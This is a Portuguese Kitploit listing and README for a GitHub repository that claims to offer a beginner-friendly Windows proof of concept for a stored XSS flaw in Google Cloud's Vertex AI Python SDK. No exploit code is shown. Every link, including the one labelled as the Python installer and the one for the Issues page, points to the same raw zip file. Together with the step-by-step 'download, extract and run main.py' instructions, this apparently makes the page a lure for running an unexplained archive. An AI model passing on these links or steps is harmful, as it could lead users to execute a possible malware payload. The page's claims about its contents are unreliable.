Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/megafart1/cve-2026-2472-vertex-ai-sdk-google-cloud
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança na NuvemAprendizado e EducaçãoSegurança de IA
GitHubmegafart1/cve-2026-2472-vertex-ai-sdk-google-cloud

CVE-2026-2472-Vertex-AI-SDK-Google-Cloud

Expor e detalhar uma vulnerabilidade de XSS armazenado não autenticado no SDK Python do Google Cloud Vertex AI que afeta as versões 1.98.0 a 1.130.9.

Ver Repositório
24há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-2472-Vertex-AI-SDK-Google-Cloud - Ferramenta Simples de Prova de Conceito

Download Now


🛠 Sobre Esta Aplicação

Esta ferramenta demonstra uma prova de conceito (PoC) técnica para o problema de segurança CVE-2026-2472. O problema afeta o Vertex AI Python SDK do Google Cloud Platform. Relaciona-se a uma vulnerabilidade de cross-site scripting (XSS) não autenticada e armazenada em partes do SDK usadas com notebooks Jupyter e Colab.

O software ajuda a ver como esta vulnerabilidade pode ser acionada. Ele funciona no Windows e não requer conhecimento de programação. Você pode testar isso com segurança no seu próprio sistema para entender o risco.


🖥 Requisitos do Sistema

Antes de começar, verifique se o seu PC atende aos seguintes requisitos:

  • Windows 10 ou mais recente (64 bits preferencial)
  • 4 GB de RAM no mínimo, 8 GB ou mais recomendado
  • Processador de 2 GHz ou mais rápido
  • Pelo menos 200 MB de espaço livre em disco
  • Conexão com a internet para baixar os arquivos e para a configuração inicial
  • Python 3.8 ou mais recente instalado (o SDK requer Python)

📦 O Que Há Dentro Deste Pacote?

Este download contém:

  • Arquivos de script Python que demonstram a vulnerabilidade XSS no Vertex AI SDK
  • Arquivos auxiliares para configurar um ambiente de teste seguro
  • Instruções para executar os testes no Windows sem experiência em hacking
  • Logs e relatórios para mostrar como a vulnerabilidade funciona

Os scripts simulam como um atacante pode injetar conteúdo malicioso em sessões de notebooks Jupyter ou Colab por meio do SDK.


🚀 Começando

Esta seção orienta passo a passo sobre como baixar, instalar e executar o software em um PC com Windows, sem necessidade de conhecimento em programação.

1. Visite a Página de Download

Clique neste link ou no botão acima para abrir a página de lançamento oficial:

https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip

2. Baixe a Última Versão

Na página de lançamento, encontre a versão mais recente. Ela aparece como um arquivo (geralmente .zip) ou uma pasta contendo os arquivos.

Clique no arquivo para baixá-lo. Salve-o em um local de fácil acesso, como sua Área de Trabalho ou pasta Downloads.


3. Extraia os Arquivos

Assim que o download terminar, localize o arquivo .zip ou pasta no seu PC.

  • Clique com o botão direito no arquivo .zip
  • Escolha "Extrair tudo..."
  • Selecione uma pasta de destino de fácil acesso, como uma nova pasta na sua Área de Trabalho
  • Clique em "Extrair"

Isso descompacta os arquivos para que você possa usá-los.


4. Instale o Python se Necessário

Esta ferramenta utiliza scripts Python. Você precisa do Python 3.8 ou posterior instalado.

Para verificar se o Python está instalado:

  • Abra o menu "Iniciar"
  • Digite cmd e abra o Prompt de Comando
  • Digite python --version e pressione Enter

Se você vir um número de versão 3.8 ou superior, pule esta etapa.

Se o Python não estiver instalado ou a versão for mais antiga:

  • Vá para https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip
  • Baixe o instalador mais recente do Python 3 para Windows
  • Execute o instalador e certifique-se de marcar "Add Python to PATH" antes de clicar em Instalar
  • Após a instalação, repita a verificação da versão no Prompt de Comando

5. Instale os Pacotes Python Necessários

Os scripts precisam de pacotes Python específicos do Python Package Index (PyPI).

Para instalá-los:

  • Abra o Prompt de Comando novamente
  • Navegue até a pasta onde você extraiu os arquivos digitando cd caminho\para\pasta (substitua caminho\para\pasta pelo local da sua pasta)
  • Execute este comando:
root@kitploit:~
pip install -r requirements.txt

Isso baixa e instala todas as bibliotecas necessárias que o programa precisa.


6. Execute o Script de Prova de Conceito

No Prompt de Comando, dentro da pasta do projeto, execute:

root@kitploit:~
python main.py

Isso inicia o script de demonstração.

O script simulará a vulnerabilidade e mostrará mensagens que explicam o que está acontecendo. Siga as instruções na tela para ver os resultados do teste.


🔍 Como Usar o Software com Segurança

  • Execute esta ferramenta apenas em sua máquina pessoal ou em um ambiente de teste seguro.
  • Não execute em nenhum serviço ou rede ativa que não seja de sua propriedade.
  • Use as saídas apenas para fins de aprendizado ou teste.
  • Este software não corrige a vulnerabilidade. Ele apenas mostra como ela funciona.

➕ Informações Extras

O Que É Cross-Site Scripting (XSS)?

XSS é um tipo de falha de segurança onde um atacante injeta scripts maliciosos em sites ou aplicações. O código do atacante pode então ser executado dentro do seu navegador ou aplicativo e causar danos.

Esta ferramenta mostra uma maneira como o XSS pode acontecer no Vertex AI SDK do Google Cloud quando usado em notebooks como Jupyter ou Colab.

Por Que Isso é Importante?

Se um atacante usar esta vulnerabilidade, ele pode executar scripts maliciosos sem estar logado. Isso pode levar a roubo de dados ou outros ataques.

Esta PoC aumenta a conscientização para que usuários e desenvolvedores possam proteger melhor seus sistemas.


📥 Onde Baixar

Visite a página de lançamento aqui para baixar os arquivos:

Baixar CVE-2026-2472-Vertex-AI-SDK-Google-Cloud


ℹ️ Tópicos Abordados

  • Como acionar ataques XSS no Vertex AI SDK
  • Trabalhando com notebooks Jupyter e Google Colab
  • Testando vulnerabilidade em ferramentas de IA baseadas em Python
  • Entendendo riscos de segurança em plataformas de nuvem

🛡 Sobre o Autor

Este repositório é para pesquisa e educação sobre segurança em plataformas de nuvem. Ele visa o problema CVE-2026-2472 que afeta o Vertex AI SDK do Google Cloud Platform.


📧 Suporte

Para perguntas ou problemas, use a página de Issues do GitHub aqui:

https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip

Baixar ferramenta